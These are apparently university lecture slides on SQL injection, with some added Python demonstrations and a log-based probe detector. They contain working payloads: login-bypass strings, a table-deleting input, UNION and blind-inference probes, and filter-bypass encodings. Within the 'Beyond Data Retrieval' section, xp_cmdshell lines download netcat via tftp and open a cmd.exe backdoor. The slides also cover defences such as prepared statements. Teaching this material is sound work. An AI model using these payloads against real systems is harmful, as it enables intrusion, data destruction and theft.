SQL Injection
CPSC 4670
Topics
1. What are injection attacks?
2. How SQL Injection Works
3. Exploiting SQL Injection Bugs
4. Mitigating SQL Injection
5. Other Injection Attacks
Injection
Injection attacks trick an application into including unintended commands in the data sent to an interpreter.
Interpreters
Interpret strings as commands.
Ex: SQL, shell (cmd.exe, bash), LDAP, XPath
Key Idea
Input data from the application is executed as
code by the interpreter.
SQL Injection
1. App sends form to user.
2. Attacker submits form with
SQL exploit data.
3. Application builds string with
exploit data.
4. Application sends SQL query
to DB.
5. DB executes query, including
exploit, sends data back to
application.
6. Application returns data to
user.
[Figure: the attacker submits the login form (password field: ' or 1=1--); the request passes through the firewall to the web server, which builds the query and sends it to the DB server, then returns the DB's response to the user.]
SQL Injection in PHP
$link = mysql_connect($DB_HOST, $DB_USERNAME, $DB_PASSWORD)
    or die("Couldn't connect: " . mysql_error());
mysql_select_db($DB_DATABASE);
// Vulnerable: $username and $password are interpolated straight into the SQL text.
$query = "select count(*) from users where username = '$username'
          and password = '$password'";
$result = mysql_query($query);
SQL Injection Attack #1
Unauthorized Access Attempt:
password = ' or 1=1 --
SQL statement becomes:
select count(*) from users where username = 'user' and password = '' or 1=1 --'
Checks if password is empty OR 1=1, which is always true, permitting access.
SQL Injection Attack #2
Database Modification Attack:
password = foo'; delete from users where username like '%
DB executes two SQL statements:
select count(*) from users where username = 'user' and password = 'foo'
delete from users where username like '%'
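The string building from the PHP slide, with the Attack #1 password, as an added Python example (not the course's code) run against a constructed in-memory SQLite users table so the effect can be reproduced offline:

```python
import sqlite3


def make_db():
    """Constructed stand-in for the slide's users table: one account, plaintext password for brevity."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT, password TEXT)")
    db.execute("INSERT INTO users VALUES ('alice', 's3cret')")
    return db


def build_login_query(username, password):
    """Same construction as the PHP slide: form input is spliced into the SQL text."""
    sql = ("select count(*) from users where username = '%s' and password = '%s'"
           % (username, password))
    return sql


def vulnerable_login(db, username, password):
    """Mirrors the PHP check: access is granted whenever count(*) is non-zero."""
    count = db.execute(build_login_query(username, password)).fetchone()[0]
    return count > 0


if __name__ == "__main__":
    db = make_db()
    # A correct password and a wrong one behave as intended ...
    print(vulnerable_login(db, "alice", "s3cret"), vulnerable_login(db, "alice", "wrong"))
    # ... but the password "' or 1=1 --" rewrites the WHERE clause to
    # username = 'alice' and password = '' or 1=1 --'   (AND binds tighter than OR,
    # and -- comments out the dangling quote), so every row matches.
    print(build_login_query("alice", "' or 1=1 --"))
    print(vulnerable_login(db, "alice", "' or 1=1 --"))
```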
Exploits of a Mom
Finding SQL Injection Bugs
1. Submit a single quote as input.
  If an error results, app is vulnerable.
  If no error, check for any output changes.
2. Submit two single quotes.
  Databases use '' to represent a literal '.
  If error disappears, app is vulnerable.
3. Try string or numeric operators.
  Oracle: '||'FOO
  MS-SQL: '+'FOO
  MySQL: ' 'FOO
  2-2
  81+19
  49-ASCII('1')
Injecting into SELECT
Most common SQL entry point.
SELECT columns
FROM table
WHERE expression
ORDER BY expression
Places where user input is inserted:
WHERE expression
ORDER BY expression
Table or column names
Injecting into INSERT
Creates a new data row in a table.
INSERT INTO table (col1, col2, ...)
VALUES (val1, val2, ...)
Requirements
Number of values must match # columns.
Types of values must match column types.
Technique: add values until no error.
foo')--
foo', 1)--
foo', 1, 1)--
Injecting into UPDATE
Modifies one or more rows of data.
UPDATE table
SET col1=val1, col2=val2, ...
WHERE expression
Places where input is inserted
SET clause
WHERE clause
Be careful with WHERE clause
' OR 1=1 will change all rows
UNION
Combines SELECTs into one result.
SELECT cols FROM table WHERE expr
UNION
SELECT cols2 FROM table2 WHERE expr2
Allows attacker to read any table
foo' UNION SELECT number FROM cc--
Requirements
Results must have same number and type of cols.
Attacker needs to know name of other table.
DB returns results with column names of the 1st query.
UNION
Finding #columns with NULL
UNION SELECT NULL--
UNION SELECT NULL, NULL--
UNION SELECT NULL, NULL, NULL--
Finding #columns with ORDER BY
ORDER BY 1--
ORDER BY 2--
ORDER BY 3--
Finding a string column to extract data
UNION SELECT 'a', NULL, NULL--
UNION SELECT NULL, 'a', NULL--
UNION SELECT NULL, NULL, 'a'--
Inference Attacks
Problem: What if app doesn't print data?
Injection can produce detectable behavior
Successful or failed web page.
Noticeable time delay or absence of delay.
Identify an exploitable URL
http://site/blog?message=5 AND 1=1
http://site/blog?message=5 AND 1=2
Use condition to identify one piece of data
SUBSTRING((SELECT TOP 1 number FROM cc), 1, 1) = 1
SUBSTRING((SELECT TOP 1 number FROM cc), 1, 1) = 2
... or use binary search technique ...
SUBSTRING((SELECT TOP 1 number FROM cc), 1, 1) > 5
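An added example (not part of the course material) of what the inference probes above look like from the defender's side: a small detector run over constructed access-log lines that flags the probe patterns and correlates the AND 1=1 / AND 1=2 pair; the log lines, addresses and timestamps are made up.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed access-log lines (Common Log Format): one ordinary request, then the probe
# sequence from the slide sent by a second client. Addresses and timestamps are invented.
LOG_LINES = [
    '10.0.0.5 - - [10/Apr/2012:10:01:02 +0000] "GET /blog?message=5 HTTP/1.1" 200 2048',
    '10.0.0.9 - - [10/Apr/2012:10:01:05 +0000] "GET /blog?message=5%20AND%201=1 HTTP/1.1" 200 2048',
    '10.0.0.9 - - [10/Apr/2012:10:01:06 +0000] "GET /blog?message=5%20AND%201=2 HTTP/1.1" 200 512',
    '10.0.0.9 - - [10/Apr/2012:10:01:09 +0000] "GET /blog?message=5%27 HTTP/1.1" 500 310',
]

LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) [^"]*" (\d{3}) (\d+)')
# Heuristic signatures for the probes discussed above; the lone-quote rule needs tuning for
# fields where apostrophes are legitimate (names, free text).
PROBE_RE = re.compile(r"(?i)\band\s+\d+\s*=\s*\d+\b|'|\bunion\s+select\b|--")
BOOL_RE = re.compile(r"(?i)\band\s+(\d+)\s*=\s*(\d+)")

def parse_line(line):
    """Split one log line into client IP, path, decoded query parameters, status and size."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    ip, url, status, size = m.groups()
    parts = urlsplit(url)  # parse_qsl also undoes the %-encoding of the probe
    return {"ip": ip, "path": parts.path, "status": int(status), "size": int(size),
            "params": parse_qsl(parts.query, keep_blank_values=True)}

def flag_probes(lines):
    """Return (ip, param, decoded value, status) for each parameter matching a probe signature."""
    hits = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        for name, value in rec["params"]:
            if PROBE_RE.search(value):
                hits.append((rec["ip"], name, value, rec["status"]))
    return hits

def inference_pairs(lines):
    """(ip, param) keys that sent both a true and a false boolean condition: the page-comparison
    step of the inference technique, which a per-request filter cannot see."""
    seen = {}
    for ip, name, value, _status in flag_probes(lines):
        m = BOOL_RE.search(value)
        if m:
            seen.setdefault((ip, name), set()).add(m.group(1) == m.group(2))
    return sorted(key for key, outcomes in seen.items() if outcomes == {True, False})
```

The differing response sizes (2048 versus 512) for the true and false probes are the "output changes" the slide tells the tester to look for; a detector can compare them the same way.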
More Examples (1)
Application authentication bypass using SQL
injection.
Suppose a web form takes userID and
password as input.
The application receives a user ID and a password and authenticates the user by checking the existence of the user in the USER table and matching the data in the PWD column.
Assume that the application is not validating
what the user types into these two fields and the
SQL statement is created by string
concatenation.
More Example (2)
The following code could be an example of such
bad practice:
sqlString = "select USERID from USER where USERID = '" & userId & "' and PWD = '" & pwd & "'"
result = GetQueryResult(sqlString)
If (result = "") Then
    userHasBeenAuthenticated = False
Else
    userHasBeenAuthenticated = True
End If
More Example (3)
User ID: ' OR ''='
Password: ' OR ''='
In this case the sqlString used to create the result set would be as follows:
select USERID from USER where USERID = '' OR ''='' and PWD = '' OR ''=''
Both ''='' comparisons are TRUE, which would certainly set the userHasBeenAuthenticated variable to True.
More Example (4)
User ID: ' OR ''='' --
Password: abc
Because anything after the -- will be ignored, the injection will work even without any specific injection into the password predicate.
More Example (5)
User ID: ' ; DROP TABLE USER ; --
Password: ' OR ''='
select USERID from USER where USERID = '' ; DROP TABLE USER ; -- ' and PWD = '' OR ''=''
I will not try to get any information, I just want to bring the application down.
Beyond Data Retrieval
Microsoft's SQL Server supports a stored procedure
xp_cmdshell that permits what amounts to arbitrary
command execution, and if this is permitted to the
web user, complete compromise of the webserver is
inevitable.
What we have done so far was limited to the web application and the underlying database, but if we can run commands, the webserver itself cannot help but be compromised. Access to xp_cmdshell is usually limited to administrative accounts, but it's possible to grant it to lesser users.
With the UTL_TCP package and its procedures and
functions, PL/SQL applications can communicate with
external TCP/IP-based servers using TCP/IP.
Because many Internet application protocols are
based on TCP/IP, this package is useful to PL/SQL
applications that use Internet protocols and e-mail.
Beyond Data Retrieval
Downloading Files
exec master..xp_cmdshell tftp
192.168.1.1 GET nc.exe c:\nc.exe
Backdoor with Netcat
exec master..xp_cmdshell nc.exe -e
cmd.exe -l -p 53
Direct Backdoor w/o External Cmds
UTL_TCP.OPEN_CONNECTION('192.168.0.1',
2222, 1521)
//charset: 1521
//port: 2222
//host: 192.168.0.1
Impact of SQL Injection
1. Leakage of sensitive information.
2. Reputation decline.
3. Modification of sensitive information.
4. Loss of control of db server.
5. Data loss.
6. Denial of service.
The Cause: String Building
Building a SQL command string with user input
in any language is dangerous.
Variable interpolation.
String concatenation with variables.
String format functions like sprintf().
String templating with variable replacement.
Mitigating SQL Injection
Ineffective Mitigations
Blacklists
Stored Procedures
Partially Effective Mitigations
Whitelists
Prepared Queries
Blacklists
Filter out or Sanitize known bad SQL meta-
characters, such as single quotes.
Problems:
1. Numeric parameters don't use quotes.
2. URL escaped metacharacters.
3. Unicode encoded metacharacters.
4. Did you miss any metacharacters?
Though it's easy to point out some dangerous
characters, it's harder to point to all of them.
Bypassing Filters
Different case
SeLecT instead of SELECT or select
Bypass keyword removal filters
SELSELECTECT
URL-encoding
%53%45%4C%45%43%54
SQL comments
SELECT/*foo*/num/*foo*/FROM/**/cc
SEL/*foo*/ECT
String Building
us||er
chr(117)||chr(115)||chr(101)||chr(114)
Stored Procedures
Stored Procedures build strings too:
CREATE PROCEDURE dbo.doQuery(@id nchar(128))
AS
  DECLARE @query nchar(256)
  -- @id is concatenated into the SQL text, so the procedure is just as injectable
  SELECT @query = 'SELECT cc FROM cust WHERE id = ''' + @id + ''''
  EXEC(@query)
RETURN
It's always possible to write a stored procedure that itself constructs a query dynamically: this provides no protection against SQL Injection. Only proper binding with prepare/execute, or direct SQL statements with bound variables, provides protection.
Whitelist
Reject input that doesn't match your list of safe characters to accept.
Identify what is good, not what is bad.
Reject input instead of attempting to repair.
Still have to deal with single quotes when
required, such as in names.
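An added Python example, not from the course, that runs the bypass inputs from the Bypassing Filters slide through a naive keyword blacklist and then through a positive whitelist of the kind described here; the filter, the inputs and the username rule are constructed for illustration.

```python
import re
from urllib.parse import unquote

BAD_KEYWORDS = ("SELECT", "UNION", "DROP")


def blacklist_sanitize(value):
    """Naive keyword-removal filter of the kind the slides warn about: case-sensitive, single pass."""
    for word in BAD_KEYWORDS:
        value = value.replace(word, "")
    return value


def as_seen_by_database(raw):
    """What reaches the interpreter when the app filters first and URL-decodes afterwards
    (a common ordering mistake). SQL keywords are case-insensitive, so upper-case for comparison."""
    return unquote(blacklist_sanitize(raw)).upper()


# Constructed inputs: three of the bypass forms from the 'Bypassing Filters' slide.
BYPASSES = {
    "different case": "SeLecT",
    "keyword removal": "SELSELECTECT",
    "url-encoding": "%53%45%4C%45%43%54",
}


def blacklist_survivors():
    """Names of the bypasses that still spell SELECT once the blacklist has run."""
    return sorted(name for name, raw in BYPASSES.items()
                  if "SELECT" in as_seen_by_database(raw))


def whitelist_accept(value):
    """Positive validation for a username field: letters, digits and underscore, 1 to 32 chars.
    Letters that happen to spell a keyword are harmless data; what matters is that quotes,
    percent signs, spaces and comment characters (anything that changes SQL structure) are refused."""
    return re.fullmatch(r"[A-Za-z0-9_]{1,32}", value) is not None
```

The whitelist deliberately lets "SeLecT" through: it is an ordinary username, and with bound parameters (Prepared Queries) a keyword inside data cannot alter the query, whereas the URL-encoded form and anything containing a quote are rejected outright rather than "repaired".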
Prepared Queries
Use bound parameters, which are supported by essentially all database programming interfaces.
In this technique, an SQL statement string is
created with placeholders - a question mark for
each parameter - and it's compiled ("prepared", in
SQL parlance) into an internal form. Later, this
prepared query is "executed" with a list of
parameters.
Example in Perl:
$sth = $dbh->prepare("SELECT email, userid FROM members WHERE email = ?;");
$sth->execute($email);
$email is the data obtained from the user's form, and it is passed as positional parameter #1 (the first question mark); at no point do the contents of this variable have anything to do with SQL statement parsing. Quotes, semicolons, backslashes, SQL comment notation - none of this has any impact, because it's "just data". There simply is nothing to subvert, so the application is largely immune to SQL injection attacks.
Prepared Queries
bound parameters in Java
Insecure version
Statement s = connection.createStatement();
ResultSet rs = s.executeQuery("SELECT email FROM member WHERE name = " + formField); // *boom*
Secure version
PreparedStatement ps = connection.prepareStatement("SELECT email FROM member WHERE name = ?");
ps.setString(1, formField);
ResultSet rs = ps.executeQuery();
There also may be some performance benefits if this prepared query is
reused multiple times (it only has to be parsed once), but this is minor
compared to the enormous security benefits. This is probably the single
most important step one can take to secure a web application.
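The insecure and secure Java versions above, reproduced as an added Python example (not from the course or the cited articles) against a constructed in-memory SQLite member table; it also shows that a name containing a legitimate quote, which the Whitelist slide mentions, needs no special handling once the value is bound:

```python
import sqlite3


def make_db():
    """Constructed member table; the second name legitimately contains a single quote."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE member (name TEXT, email TEXT)")
    db.executemany("INSERT INTO member VALUES (?, ?)",
                   [("alice", "alice@example.org"), ("O'Brien", "obrien@example.org")])
    return db


def lookup_email_insecure(db, form_field):
    """String concatenation, as in the 'Insecure version': the form value becomes SQL text."""
    sql = "SELECT email FROM member WHERE name = '" + form_field + "'"
    return [row[0] for row in db.execute(sql)]


def lookup_email_prepared(db, form_field):
    """Bound parameter, as in the 'Secure version': '?' is a placeholder, the value is passed
    separately to the driver and is never parsed as SQL."""
    sql = "SELECT email FROM member WHERE name = ?"
    return [row[0] for row in db.execute(sql, (form_field,))]


def insecure_breaks_on_quote(db, name):
    """True when the concatenated query cannot even be parsed for this input (an apostrophe in
    a real name): the same error a tester looks for with the single-quote check."""
    try:
        lookup_email_insecure(db, name)
    except sqlite3.OperationalError:
        return True
    return False
```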
References:
http://devzone.zend.com/article/686
http://unixwiz.net/techtips/sql-injection.html
Prepared Queries
<?php
$mysqli = new mysqli('localhost', 'user', 'password', 'world');
/* check connection */
if (mysqli_connect_errno()) {
    printf("Connect failed: %s\n", mysqli_connect_error());
    exit();
}
$stmt = $mysqli->prepare("INSERT INTO CountryLanguage VALUES (?, ?, ?, ?)");
$stmt->bind_param('sssd', $code, $language, $official, $percent); // sssd: three strings, one double
$code = 'DEU';
$language = 'Bavarian';
$official = "F";
$percent = 11.2;
/* execute prepared statement */
$stmt->execute();
printf("%d Row inserted.\n", $stmt->affected_rows);
/* close statement and connection */
$stmt->close();
/* Clean up table CountryLanguage */
$mysqli->query("DELETE FROM CountryLanguage WHERE Language='Bavarian'");
printf("%d Row deleted.\n", $mysqli->affected_rows);
/* close connection */
$mysqli->close();
?>
Other Injection Types
Shell injection.
Scripting language injection.
File inclusion.
XML injection.
XPath injection.
LDAP injection.
SMTP injection.
SQL injection Conclusion
SQL injection is a technique for exploiting applications that use relational databases as their back end.
Applications compose SQL statements and send them to the database.
SQL injection uses the fact that many of these applications concatenate the fixed part of the SQL statement with user-supplied data that forms WHERE predicates or additional sub-queries.
SQL injection Conclusion
The technique is based on malformed user-supplied data that
transforms innocent SQL calls into malicious ones and
causes unauthorized access, deletion of data, or theft of information.
All databases can be a target of SQL injection and all are vulnerable to this technique.
The vulnerability is in the application layer outside of the database, and it exists from the moment the application has a connection into the database.
Project 7: Due on April 25
Visit the website for information about WebGoat:
http://www.irongeek.com/i.php?page=videos/webgoat-sql-injection
Read the WebGoat User and Install Guide:
http://www.owasp.org/index.php/Category:OWASP_WebGoat_Project
Install WebGoat and play with SQL injection.
References
1. Andres Andreu, Professional Pen Testing for Web Applications, Wrox, 2006.
2. Chris Anley, Advanced SQL Injection In SQL Server Applications, http://www.nextgenss.com/papers/advanced_sql_injection.pdf, 2002.
3. Stephen J. Friedl, SQL Injection Attacks by Example, http://www.unixwiz.net/techtips/sql-injection.html, 2005.
4. Ferruh Mavituna, SQL Injection Cheat Sheet, http://ferruh.mavituna.com/sql-injection-cheatsheet-oku
5. J.D. Meier, et al., Improving Web Application Security: Threats and Countermeasures, Microsoft, http://msdn2.microsoft.com/en-us/library/aa302418.aspx, 2006.
6. Randall Munroe, XKCD, http://xkcd.com/327/
7. OWASP, OWASP Testing Guide v2, http://www.owasp.org/index.php/Testing_for_SQL_Injection, 2007.
8. Joel Scambray, Mike Shema, and Caleb Sima, Hacking Exposed: Web Applications, 2nd edition, Addison-Wesley, 2006.
9. SEMS, SQL Injection used to hack Real Estate Web Sites, http://www.semspot.com/2007/12/19/sql-injection-used-to-hack-real-estate-websites-extreme-blackhat/, 2007.
10. Chris Shiflett, Essential PHP Security, O'Reilly, 2005.
11. SK, SQL Injection Walkthrough, http://www.securiteam.com/securityreviews/5DP0N1P76E.html, 2002.
12. SPI Labs, Blind SQL Injection, http://sqlinjection.com/assets/documents/Blind_SQLInjection.pdf, 2007.
13. Dafydd Stuttard and Marcus Pinto, The Web Application Hacker's Handbook, Wiley, 2007.
14. WASC, Web Application Incidents Annual Report 2007, https://bsn.breach.com/downloads/whid/The%20Web%20Hacking%20Incidents%20Database%20Annual%20Report%202007.pdf, 2008.